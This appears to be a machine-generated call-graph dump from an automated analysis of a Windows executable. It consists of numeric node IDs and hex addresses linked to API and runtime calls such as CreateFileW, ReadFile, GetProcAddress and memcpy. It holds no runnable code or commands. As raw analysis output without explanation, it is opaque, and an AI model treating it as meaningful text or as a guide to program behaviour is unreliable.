memset _snwprintf wcscpy 39268->39269 39269->39263 39270->38626 39271->39260 39275 41443e 39272->39275 39274 414866 39274->39263 39276 41444b 39275->39276 39277 414451 39276->39277 39278 4144a3 GetPrivateProfileStringW 39276->39278 39279 414491 39277->39279 39280 414455 wcschr 39277->39280 39278->39274 39282 414495 WritePrivateProfileStringW 39279->39282 39280->39279 39281 414463 _snwprintf 39280->39281 39281->39282 39282->39274 39283->38631 39285 40b2cc 27 API calls 39284->39285 39286 409615 39285->39286 39287 409d1f 6 API calls 39286->39287 39288 409625 39287->39288 39313 409b98 GetFileAttributesW 39288->39313 39290 409634 39291 409648 39290->39291 39314 4091b8 memset 39290->39314 39293 40b2cc 27 API calls 39291->39293 39295 408801 39291->39295 39294 40965d 39293->39294 39296 409d1f 6 API calls 39294->39296 39295->38634 39295->38678 39297 40966d 39296->39297 39366 409b98 GetFileAttributesW 39297->39366 39299 40967c 39299->39295 39300 409681 39299->39300 39367 409529 72 API calls 39300->39367 39302 409690 39302->39295 39303->38656 39304->38678 39305->38661 39306->38678 39307->38666 39308->38667 39313->39290 39368 40a6e6 WideCharToMultiByte 39314->39368 39316 409202 39369 444432 39316->39369 39319 40b273 27 API calls 39320 409236 39319->39320 39415 438552 39320->39415 39323 409383 39325 40b273 27 API calls 39323->39325 39327 409399 39325->39327 39326 409254 39328 40937b 39326->39328 39436 4253cf 17 API calls 39326->39436 39329 438552 133 API calls 39327->39329 39440 424f26 122 API calls 39328->39440 39348 4093a3 39329->39348 39332 409267 39437 4253cf 17 API calls 39332->39437 39333 4094ff 39444 443d90 39333->39444 39336 4251c4 136 API calls 39336->39348 39337 409273 39438 4253af 17 API calls 39337->39438 39338 409507 39346 40951d 39338->39346 39464 408f2f 77 API calls 39338->39464 39340 4093df 39443 424f26 122 API calls 39340->39443 39342 4253cf 17 API calls 39342->39348 39346->39291 39348->39333 39348->39336 39348->39340 39348->39342 39350 4093e4 39348->39350 39441 4253af 17 API calls 39350->39441 39356 4093ed 39442 4253af 17 API calls 39356->39442 39359 4093f9 39359->39340 39360 409409 memcmp 39359->39360 39360->39340 39361 409421 memcmp 39360->39361 39362 4094a4 memcmp 39361->39362 39363 409435 39361->39363 39362->39340 39365 4094b8 memcpy memcpy 39362->39365 39363->39340 39364 409442 memcpy memcpy memcpy 39363->39364 39364->39340 39365->39340 39366->39299 39367->39302 39368->39316 39465 4438b5 39369->39465 39371 44444c 39377 409215 39371->39377 39479 415a6d 39371->39479 39374 444486 39376 4444b9 memcpy 39374->39376 39414 4444a4 39374->39414 39375 44469e 39375->39377 39379 443d90 110 API calls 39375->39379 39483 415258 39376->39483 39377->39319 39377->39346 39379->39377 39380 444524 39381 444541 39380->39381 39382 44452a 39380->39382 39486 444316 39381->39486 39520 416935 39382->39520 39386 444316 18 API calls 39387 444563 39386->39387 39388 444316 18 API calls 39387->39388 39389 44456f 39388->39389 39390 444316 18 API calls 39389->39390 39391 44457f 39390->39391 39391->39414 39500 432d4e 39391->39500 39394 444316 18 API calls 39395 4445b0 39394->39395 39504 41eed2 39395->39504 39533 4442e6 11 API calls 39414->39533 39534 438460 39415->39534 39417 409240 39417->39323 39418 4251c4 39417->39418 39546 424f07 39418->39546 39420 4251e4 39421 4251f7 39420->39421 39422 4251e8 39420->39422 39554 4250f8 39421->39554 39553 4446ea 11 API calls 39422->39553 39424 4251f2 39424->39326 39426 425209 39429 425249 39426->39429 39432 4250f8 126 API calls 39426->39432 39433 425287 39426->39433 39562 4384e9 134 API calls 39426->39562 39563 424f74 123 API calls 39426->39563 39429->39433 39564 424ff0 13 API calls 39429->39564 39432->39426 39566 415c7d 16 API calls 39433->39566 39434 425266 39434->39433 39565 415be9 memcpy 39434->39565 39436->39332 39437->39337 39440->39323 39441->39356 39442->39359 39443->39333 39445 443da3 39444->39445 39463 443db6 39444->39463 39567 41707a 11 API calls 39445->39567 39447 443da8 39448 443dac 39447->39448 39450 443dbc 39447->39450 39568 4446ea 11 API calls 39448->39568 39569 4300e8 memset memset memcpy 39450->39569 39452 443de0 39453 416935 16 API calls 39452->39453 39453->39463 39454 443dce 39454->39452 39458 443e22 39454->39458 39455 443e5a 39458->39455 39570 41f0ac 102 API calls 39458->39570 39463->39338 39464->39346 39466 4438d0 39465->39466 39472 4438c9 39465->39472 39467 415378 memcpy memcpy 39466->39467 39468 4438d5 39467->39468 39469 4154e2 10 API calls 39468->39469 39470 443906 39468->39470 39468->39472 39469->39470 39471 443970 memset 39470->39471 39470->39472 39474 44398b 39471->39474 39472->39371 39473 415700 10 API calls 39476 4439c0 39473->39476 39475 41975c 10 API calls 39474->39475 39477 4439a0 39474->39477 39475->39477 39476->39472 39478 418981 10 API calls 39476->39478 39477->39472 39477->39473 39478->39472 39480 415a77 39479->39480 39481 415a8d 39480->39481 39482 415a7e memset 39480->39482 39481->39374 39482->39481 39484 4438b5 11 API calls 39483->39484 39485 41525d 39484->39485 39485->39380 39487 444328 39486->39487 39488 444423 39487->39488 39489 44434e 39487->39489 39490 4446ea 11 API calls 39488->39490 39491 432d4e memset memset memcpy 39489->39491 39497 444381 39490->39497 39492 44435a 39491->39492 39494 444375 39492->39494 39499 44438b 39492->39499 39493 432d4e memset memset memcpy 39495 4443ec 39493->39495 39496 416935 16 API calls 39494->39496 39495->39497 39498 416935 16 API calls 39495->39498 39496->39497 39497->39386 39498->39497 39499->39493 39501 432d58 39500->39501 39503 432d65 39500->39503 39502 432cc4 memset memset memcpy 39501->39502 39502->39503 39503->39394 39505 41eee2 39504->39505 39521 41693e 39520->39521 39524 41698e 39520->39524 39522 41694c 39521->39522 39523 422fd1 memset 39521->39523 39522->39524 39525 4165a0 11 API calls 39522->39525 39523->39522 39524->39414 39526 416972 39525->39526 39526->39524 39527 422b84 15 API calls 39526->39527 39527->39524 39533->39375 39535 41703f 11 API calls 39534->39535 39536 43847a 39535->39536 39537 43848a 39536->39537 39538 43847e 39536->39538 39540 438270 133 API calls 39537->39540 39539 4446ea 11 API calls 39538->39539 39542 438488 39539->39542 39541 4384aa 39540->39541 39541->39542 39543 424f26 122 API calls 39541->39543 39542->39417 39544 4384bb 39543->39544 39545 438270 133 API calls 39544->39545 39545->39542 39547 424f1f 39546->39547 39548 424f0c 39546->39548 39550 424eea 11 API calls 39547->39550 39549 416760 11 API calls 39548->39549 39551 424f18 39549->39551 39552 424f24 39550->39552 39551->39420 39552->39420 39553->39424 39555 425108 39554->39555 39561 42510d 39554->39561 39556 424f74 123 API calls 39555->39556 39556->39561 39557 42569b 124 API calls 39558 42516e 39557->39558 39560 415c7d 16 API calls 39558->39560 39559 425115 39559->39426 39560->39559 39561->39557 39561->39559 39562->39426 39563->39426 39564->39434 39565->39433 39566->39424 39567->39447 39568->39463 39569->39454 39570->39458 39601 413f4f 39573->39601 39576 413f37 K32GetModuleFileNameExW 39577 413f4a 39576->39577 39577->38695 39579 41396c wcschr 39578->39579 39581 413969 wcscpy 39578->39581 39579->39581 39582 41398e 39579->39582 39583 413a3a 39581->39583 39606 4097f7 wcslen wcslen _memicmp 39582->39606 39583->38695 39585 41399a 39586 4139a4 memset 39585->39586 39587 4139e6 39585->39587 39607 409dd5 GetWindowsDirectoryW wcscpy 39586->39607 39589 413a31 wcscpy 39587->39589 39590 4139ec memset 39587->39590 39589->39583 39608 409dd5 GetWindowsDirectoryW wcscpy 39590->39608 39591 4139c9 wcscpy wcscat 39591->39583 39593 413a11 memcpy wcscat 39593->39583 39595 413cb0 GetModuleHandleW 39594->39595 39596 413cda 39594->39596 39595->39596 39597 413cbf GetProcAddress 39595->39597 39598 413ce3 GetProcessTimes 39596->39598 39599 413cf6 39596->39599 39597->39596 39598->38697 39599->38697 39600->38688 39602 413f2f 39601->39602 39603 413f54 39601->39603 39602->39576 39602->39577 39604 40a804 8 API calls 39603->39604 39605 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39604->39605 39605->39602 39606->39585 39607->39591 39608->39593 39609->38718 39610->38740 39612 409cf9 GetVersionExW 39611->39612 39613 409d0a 39611->39613 39612->39613 39613->38747 39613->38750 39614->38754 39615->38756 39616->38822 39618 40bba5 39617->39618 39665 40cc26 39618->39665 39621 40bd4b 39686 40cc0c 39621->39686 39626 40b2cc 27 API calls 39627 40bbef 39626->39627 39693 40ccf0 _wcsicmp 39627->39693 39629 40bbf5 39629->39621 39694 40ccb4 6 API calls 39629->39694 39631 40bc26 39632 40cf04 17 API calls 39631->39632 39633 40bc2e 39632->39633 39634 40bd43 39633->39634 39635 40b2cc 27 API calls 39633->39635 39636 40cc0c 4 API calls 39634->39636 39637 40bc40 39635->39637 39636->39621 39695 40ccf0 _wcsicmp 39637->39695 39639 40bc46 39639->39634 39640 40bc61 memset memset WideCharToMultiByte 39639->39640 39696 40103c strlen 39640->39696 39642 40bcc0 39643 40b273 27 API calls 39642->39643 39644 40bcd0 memcmp 39643->39644 39644->39634 39645 40bce2 39644->39645 39646 404423 37 API calls 39645->39646 39647 40bd10 39646->39647 39647->39634 39648 40bd3a LocalFree 39647->39648 39649 40bd1f memcpy 39647->39649 39648->39634 39649->39648 39650->38837 39652 409a74 GetTempFileNameW 39651->39652 39653 409a66 GetWindowsDirectoryW 39651->39653 39652->38835 39653->39652 39654->38872 39655->38872 39656->38872 39657->38872 39658->38872 39659->38872 39660->38872 39661->38872 39662->38872 39663->38847 39664->38869 39697 4096c3 CreateFileW 39665->39697 39667 40cc34 39668 40cc3d GetFileSize 39667->39668 39669 40bbca 39667->39669 39670 40afcf 2 API calls 39668->39670 39669->39621 39677 40cf04 39669->39677 39671 40cc64 39670->39671 39698 40a2ef ReadFile 39671->39698 39673 40cc71 39699 40ab4a MultiByteToWideChar 39673->39699 39675 40cc95 CloseHandle 39676 40b04b ??3@YAXPAX 39675->39676 39676->39669 39678 40b633 free 39677->39678 39679 40cf14 39678->39679 39705 40b1ab free free 39679->39705 39681 40bbdd 39681->39621 39681->39626 39682 40cf1b 39682->39681 39684 40cfef 39682->39684 39706 40cd4b 39682->39706 39685 40cd4b 14 API calls 39684->39685 39685->39681 39687 40b633 free 39686->39687 39688 40cc15 39687->39688 39689 40aa04 free 39688->39689 39690 40cc1d 39689->39690 39752 40b1ab free free 39690->39752 39692 40b7d4 memset CreateFileW 39692->38828 39692->38829 39693->39629 39694->39631 39695->39639 39696->39642 39697->39667 39698->39673 39700 40ab6b 39699->39700 39704 40ab93 39699->39704 39701 40a9ce 4 API calls 39700->39701 39702 40ab74 39701->39702 39703 40ab7c MultiByteToWideChar 39702->39703 39703->39704 39704->39675 39705->39682 39707 40cd7b 39706->39707 39740 40aa29 6 API calls 39707->39740 39709 40cef5 39710 40aa04 free 39709->39710 39711 40cefd 39710->39711 39711->39682 39712 40cd89 39712->39709 39741 40aa29 6 API calls 39712->39741 39714 40ce1d 39742 40aa29 6 API calls 39714->39742 39716 40ce3e 39717 40ce6a 39716->39717 39743 40abb7 wcslen memmove 39716->39743 39718 40ce9f 39717->39718 39746 40abb7 wcslen memmove 39717->39746 39749 40a8d0 7 API calls 39718->39749 39722 40ce56 39744 40aa71 wcslen 39722->39744 39723 40ce8b 39747 40aa71 wcslen 39723->39747 39724 40ceb5 39750 40a8d0 7 API calls 39724->39750 39727 40ce5e 39745 40abb7 wcslen memmove 39727->39745 39728 40ce93 39748 40abb7 wcslen memmove 39728->39748 39732 40cecb 39751 40d00b malloc memcpy free free 39732->39751 39734 40cedd 39735 40aa04 free 39734->39735 39736 40cee5 39735->39736 39737 40aa04 free 39736->39737 39738 40ceed 39737->39738 39739 40aa04 free 39738->39739 39739->39709 39740->39712 39741->39714 39742->39716 39743->39722 39744->39727 39745->39717 39746->39723 39747->39728 39748->39718 39749->39724 39750->39732 39751->39734 39752->39692 39753->38887 39754->38895 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39764 4148b6 FindResourceW 39765 4148cf SizeofResource 39764->39765 39768 4148f9 39764->39768 39766 4148e0 LoadResource 39765->39766 39765->39768 39767 4148ee LockResource 39766->39767 39766->39768 39767->39768 37851 415304 free 39769 441b3f 39779 43a9f6 39769->39779 39771 441b61 39952 4386af memset 39771->39952 39773 44189a 39774 4418e2 39773->39774 39776 442bd4 39773->39776 39775 4418ea 39774->39775 39953 4414a9 12 API calls 39774->39953 39776->39775 39954 441409 memset 39776->39954 39780 43aa20 39779->39780 39781 43aadf 39779->39781 39780->39781 39782 43aa34 memset 39780->39782 39781->39771 39783 43aa56 39782->39783 39784 43aa4d 39782->39784 39955 43a6e7 39783->39955 39963 42c02e memset 39784->39963 39789 43aad3 39965 4169a7 11 API calls 39789->39965 39790 43aaae 39790->39781 39790->39789 39805 43aae5 39790->39805 39791 43ac18 39794 43ac47 39791->39794 39967 42bbd5 memcpy memcpy memcpy memset memcpy 39791->39967 39795 43aca8 39794->39795 39968 438eed 16 API calls 39794->39968 39798 43acd5 39795->39798 39970 4233ae 11 API calls 39795->39970 39971 423426 11 API calls 39798->39971 39799 43ac87 39969 4233c5 16 API calls 39799->39969 39803 43ace1 39972 439811 162 API calls 39803->39972 39804 43a9f6 160 API calls 39804->39805 39805->39781 39805->39791 39805->39804 39966 439bbb 22 API calls 39805->39966 39807 43acfd 39812 43ad2c 39807->39812 39973 438eed 16 API calls 39807->39973 39809 43ad19 39974 4233c5 16 API calls 39809->39974 39810 43ad58 39975 44081d 162 API calls 39810->39975 39812->39810 39816 43add9 39812->39816 39815 43ae3a memset 39817 43ae73 39815->39817 39816->39816 39979 423426 11 API calls 39816->39979 39980 42e1c0 146 API calls 39817->39980 39818 43adab 39977 438c4e 162 API calls 39818->39977 39821 43ad6c 39821->39781 39821->39818 39976 42370b memset memcpy memset 39821->39976 39823 43adcc 39978 440f84 12 API calls 39823->39978 39824 43ae96 39981 42e1c0 146 API calls 39824->39981 39827 43aea8 39828 43aec1 39827->39828 39982 42e199 146 API calls 39827->39982 39829 43af00 39828->39829 39983 42e1c0 146 API calls 39828->39983 39829->39781 39833 43af1a 39829->39833 39834 43b3d9 39829->39834 39984 438eed 16 API calls 39833->39984 39840 43b3f6 39834->39840 39842 43b4c8 39834->39842 39836 43b60f 39836->39781 40043 4393a5 17 API calls 39836->40043 39838 43af2f 39985 4233c5 16 API calls 39838->39985 40025 432878 12 API calls 39840->40025 39841 43af51 39986 423426 11 API calls 39841->39986 39844 43b4f2 39842->39844 40031 42bbd5 memcpy memcpy memcpy memset memcpy 39842->40031 40032 43a76c 21 API calls 39844->40032 39846 43af7d 39987 423426 11 API calls 39846->39987 39850 43b529 40033 44081d 162 API calls 39850->40033 39851 43b462 40027 423330 11 API calls 39851->40027 39852 43af94 39988 423330 11 API calls 39852->39988 39856 43afca 39989 423330 11 API calls 39856->39989 39857 43b47e 39861 43b497 39857->39861 40028 42374a memcpy memset memcpy memcpy memcpy 39857->40028 39858 43b544 39862 43b55c 39858->39862 40034 42c02e memset 39858->40034 39859 43b428 39859->39851 40026 432b60 16 API calls 39859->40026 40029 4233ae 11 API calls 39861->40029 40035 43a87a 162 API calls 39862->40035 39863 43afdb 39990 4233ae 11 API calls 39863->39990 39869 43b56c 39872 43b58a 39869->39872 40036 423330 11 API calls 39869->40036 39870 43b4b1 40030 423399 11 API calls 39870->40030 39871 43afee 39991 44081d 162 API calls 39871->39991 40037 440f84 12 API calls 39872->40037 39874 43b4c1 40039 42db80 162 API calls 39874->40039 39879 43b592 40038 43a82f 16 API calls 39879->40038 39882 43b5b4 40040 438c4e 162 API calls 39882->40040 39884 43b5cf 40041 42c02e memset 39884->40041 39886 43b005 39886->39781 39890 43b01f 39886->39890 39992 42d836 162 API calls 39886->39992 39887 43b1ef 40002 4233c5 16 API calls 39887->40002 39890->39887 40000 423330 11 API calls 39890->40000 40001 42d71d 162 API calls 39890->40001 39891 43b212 40003 423330 11 API calls 39891->40003 39892 43b087 39993 4233ae 11 API calls 39892->39993 39893 43add4 39893->39836 40042 438f86 16 API calls 39893->40042 39897 43b22a 40004 42ccb5 11 API calls 39897->40004 39900 43b23f 40005 4233ae 11 API calls 39900->40005 39901 43b10f 39996 423330 11 API calls 39901->39996 39903 43b257 40006 4233ae 11 API calls 39903->40006 39907 43b129 39997 4233ae 11 API calls 39907->39997 39908 43b26e 40007 4233ae 11 API calls 39908->40007 39911 43b09a 39911->39901 39994 42cc15 19 API calls 39911->39994 39995 4233ae 11 API calls 39911->39995 39912 43b282 40008 43a87a 162 API calls 39912->40008 39914 43b13c 39998 440f84 12 API calls 39914->39998 39916 43b29d 40009 423330 11 API calls 39916->40009 39919 43b15f 39999 4233ae 11 API calls 39919->39999 39920 43b2af 39922 43b2b8 39920->39922 39923 43b2ce 39920->39923 40010 4233ae 11 API calls 39922->40010 40011 440f84 12 API calls 39923->40011 39926 43b2c9 40013 4233ae 11 API calls 39926->40013 39927 43b2da 40012 42370b memset memcpy memset 39927->40012 39930 43b2f9 40014 423330 11 API calls 39930->40014 39932 43b30b 40015 423330 11 API calls 39932->40015 39934 43b325 40016 423399 11 API calls 39934->40016 39936 43b332 40017 4233ae 11 API calls 39936->40017 39938 43b354 40018 423399 11 API calls 39938->40018 39940 43b364 40019 43a82f 16 API calls 39940->40019 39942 43b370 40020 42db80 162 API calls 39942->40020 39944 43b380 40021 438c4e 162 API calls 39944->40021 39946 43b39e 40022 423399 11 API calls 39946->40022 39948 43b3ae 40023 43a76c 21 API calls 39948->40023 39950 43b3c3 40024 423399 11 API calls 39950->40024 39952->39773 39953->39775 39954->39776 39956 43a6f5 39955->39956 39957 43a765 39955->39957 39956->39957 40044 42a115 39956->40044 39957->39781 39964 4397fd memset 39957->39964 39961 43a73d 39961->39957 39962 42a115 146 API calls 39961->39962 39962->39957 39963->39783 39964->39790 39965->39781 39966->39805 39967->39794 39968->39799 39969->39795 39970->39798 39971->39803 39972->39807 39973->39809 39974->39812 39975->39821 39976->39818 39977->39823 39978->39893 39979->39815 39980->39824 39981->39827 39982->39828 39983->39828 39984->39838 39985->39841 39986->39846 39987->39852 39988->39856 39989->39863 39990->39871 39991->39886 39992->39892 39993->39911 39994->39911 39995->39911 39996->39907 39997->39914 39998->39919 39999->39890 40000->39890 40001->39890 40002->39891 40003->39897 40004->39900 40005->39903 40006->39908 40007->39912 40008->39916 40009->39920 40010->39926 40011->39927 40012->39926 40013->39930 40014->39932 40015->39934 40016->39936 40017->39938 40018->39940 40019->39942 40020->39944 40021->39946 40022->39948 40023->39950 40024->39893 40025->39859 40026->39851 40027->39857 40028->39861 40029->39870 40030->39874 40031->39844 40032->39850 40033->39858 40034->39862 40035->39869 40036->39872 40037->39879 40038->39874 40039->39882 40040->39884 40041->39893 40042->39836 40043->39781 40045 42a175 40044->40045 40047 42a122 40044->40047 40045->39957 40050 42b13b 146 API calls 40045->40050 40047->40045 40048 42a115 146 API calls 40047->40048 40051 43a174 40047->40051 40075 42a0a8 146 API calls 40047->40075 40048->40047 40050->39961 40065 43a196 40051->40065 40066 43a19e 40051->40066 40052 43a306 40052->40065 40095 4388c4 14 API calls 40052->40095 40055 42a115 146 API calls 40055->40066 40057 43a642 40057->40065 40099 4169a7 11 API calls 40057->40099 40061 43a635 40098 42c02e memset 40061->40098 40065->40047 40066->40052 40066->40055 40066->40065 40076 42ff8c 40066->40076 40084 415a91 40066->40084 40088 4165ff 40066->40088 40091 439504 13 API calls 40066->40091 40092 4312d0 146 API calls 40066->40092 40093 42be4c memcpy memcpy memcpy memset memcpy 40066->40093 40094 43a121 11 API calls 40066->40094 40068 42bf4c 14 API calls 40070 43a325 40068->40070 40069 4169a7 11 API calls 40069->40070 40070->40057 40070->40061 40070->40065 40070->40068 40070->40069 40071 42b5b5 memset memcpy 40070->40071 40074 4165ff 11 API calls 40070->40074 40096 42b63e 14 API calls 40070->40096 40097 42bfcf memcpy 40070->40097 40071->40070 40074->40070 40075->40047 40100 43817e 40076->40100 40078 42ff9d 40078->40066 40079 42ff99 40079->40078 40080 42ffe3 40079->40080 40081 42ffd0 40079->40081 40105 4169a7 11 API calls 40080->40105 40104 4169a7 11 API calls 40081->40104 40085 415a9d 40084->40085 40086 415ab3 40085->40086 40087 415aa4 memset 40085->40087 40086->40066 40087->40086 40256 4165a0 40088->40256 40091->40066 40092->40066 40093->40066 40094->40066 40095->40070 40096->40070 40097->40070 40098->40057 40099->40065 40101 438187 40100->40101 40103 438192 40100->40103 40106 4380f6 40101->40106 40103->40079 40104->40078 40105->40078 40108 43811f 40106->40108 40107 438164 40107->40103 40108->40107 40111 437e5e 40108->40111 40134 4300e8 memset memset memcpy 40108->40134 40135 437d3c 40111->40135 40113 437eb3 40113->40108 40114 437ea9 40114->40113 40120 437f22 40114->40120 40150 41f432 40114->40150 40117 437f06 40197 415c56 11 API calls 40117->40197 40118 437f7f 40121 437f95 40118->40121 40124 43802b 40118->40124 40120->40118 40122 432d4e 3 API calls 40120->40122 40198 415c56 11 API calls 40121->40198 40122->40118 40125 4165ff 11 API calls 40124->40125 40126 438054 40125->40126 40161 437371 40126->40161 40129 43806b 40130 438094 40129->40130 40199 42f50e 137 API calls 40129->40199 40132 437fa3 40130->40132 40200 4300e8 memset memset memcpy 40130->40200 40132->40113 40201 41f638 103 API calls 40132->40201 40134->40108 40136 437d69 40135->40136 40139 437d80 40135->40139 40202 437ccb 11 API calls 40136->40202 40138 437d76 40138->40114 40139->40138 40140 437da3 40139->40140 40141 437d90 40139->40141 40143 438460 133 API calls 40140->40143 40141->40138 40206 437ccb 11 API calls 40141->40206 40146 437dcb 40143->40146 40144 437de8 40205 424f26 122 API calls 40144->40205 40146->40144 40203 444283 13 API calls 40146->40203 40148 437dfc 40204 437ccb 11 API calls 40148->40204 40151 41f54d 40150->40151 40157 41f44f 40150->40157 40152 41f466 40151->40152 40236 41c635 memset memset 40151->40236 40152->40117 40152->40120 40157->40152 40159 41f50b 40157->40159 40207 41f1a5 40157->40207 40232 41c06f memcmp 40157->40232 40233 41f3b1 89 API calls 40157->40233 40234 41f398 85 API calls 40157->40234 40159->40151 40159->40152 40235 41c295 85 API calls 40159->40235 40237 41703f 40161->40237 40163 437399 40164 43739d 40163->40164 40166 4373ac 40163->40166 40244 4446ea 11 API calls 40164->40244 40167 416935 16 API calls 40166->40167 40168 4373ca 40167->40168 40170 438460 133 API calls 40168->40170 40174 4251c4 136 API calls 40168->40174 40178 415a91 memset 40168->40178 40181 43758f 40168->40181 40193 437584 40168->40193 40196 437d3c 134 API calls 40168->40196 40245 425433 13 API calls 40168->40245 40246 425413 17 API calls 40168->40246 40247 42533e 16 API calls 40168->40247 40248 42538f 16 API calls 40168->40248 40249 42453e 122 API calls 40168->40249 40169 4375bc 40252 415c7d 16 API calls 40169->40252 40170->40168 40173 4375d2 40195 4373a7 40173->40195 40253 4442e6 11 API calls 40173->40253 40174->40168 40176 4375e2 40176->40195 40254 444283 13 API calls 40176->40254 40178->40168 40250 42453e 122 API calls 40181->40250 40182 4375f4 40187 437620 40182->40187 40188 43760b 40182->40188 40186 43759f 40189 416935 16 API calls 40186->40189 40191 416935 16 API calls 40187->40191 40255 444283 13 API calls 40188->40255 40189->40193 40191->40195 40193->40169 40251 42453e 122 API calls 40193->40251 40194 437612 memcpy 40194->40195 40195->40129 40196->40168 40197->40113 40198->40132 40199->40130 40200->40132 40201->40113 40202->40138 40203->40148 40204->40144 40205->40138 40206->40138 40208 41bc3b 100 API calls 40207->40208 40209 41f1b4 40208->40209 40210 41edad 85 API calls 40209->40210 40217 41f282 40209->40217 40211 41f1cb 40210->40211 40212 41f1f5 memcmp 40211->40212 40213 41f20e 40211->40213 40211->40217 40212->40213 40214 41f21b memcmp 40213->40214 40213->40217 40215 41f326 40214->40215 40218 41f23d 40214->40218 40216 41ee6b 85 API calls 40215->40216 40215->40217 40216->40217 40217->40157 40218->40215 40219 41f28e memcmp 40218->40219 40221 41c8df 55 API calls 40218->40221 40219->40215 40220 41f2a9 40219->40220 40220->40215 40223 41f308 40220->40223 40224 41f2d8 40220->40224 40222 41f269 40221->40222 40222->40215 40225 41f287 40222->40225 40226 41f27a 40222->40226 40223->40215 40230 4446ce 11 API calls 40223->40230 40227 41ee6b 85 API calls 40224->40227 40225->40219 40228 41ee6b 85 API calls 40226->40228 40229 41f2e0 40227->40229 40228->40217 40231 41b1ca memset 40229->40231 40230->40215 40231->40217 40232->40157 40233->40157 40234->40157 40235->40151 40236->40152 40238 417044 40237->40238 40239 41705c 40237->40239 40241 416760 11 API calls 40238->40241 40243 417055 40238->40243 40240 417075 40239->40240 40242 41707a 11 API calls 40239->40242 40240->40163 40241->40243 40242->40238 40243->40163 40244->40195 40245->40168 40246->40168 40247->40168 40248->40168 40249->40168 40250->40186 40251->40169 40252->40173 40253->40176 40254->40182 40255->40194 40261 415cfe 40256->40261 40265 415d23 __aullrem __aulldvrm 40261->40265 40268 41628e 40261->40268 40262 4163ca 40275 416422 11 API calls 40262->40275 40264 416172 memset 40264->40265 40265->40262 40265->40264 40266 416422 10 API calls 40265->40266 40267 415cb9 10 API calls 40265->40267 40265->40268 40266->40265 40267->40265 40269 416520 40268->40269 40270 416527 40269->40270 40274 416574 40269->40274 40272 416544 40270->40272 40270->40274 40276 4156aa 11 API calls 40270->40276 40273 416561 memcpy 40272->40273 40272->40274 40273->40274 40274->40066 40275->40268 40276->40272 40298 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 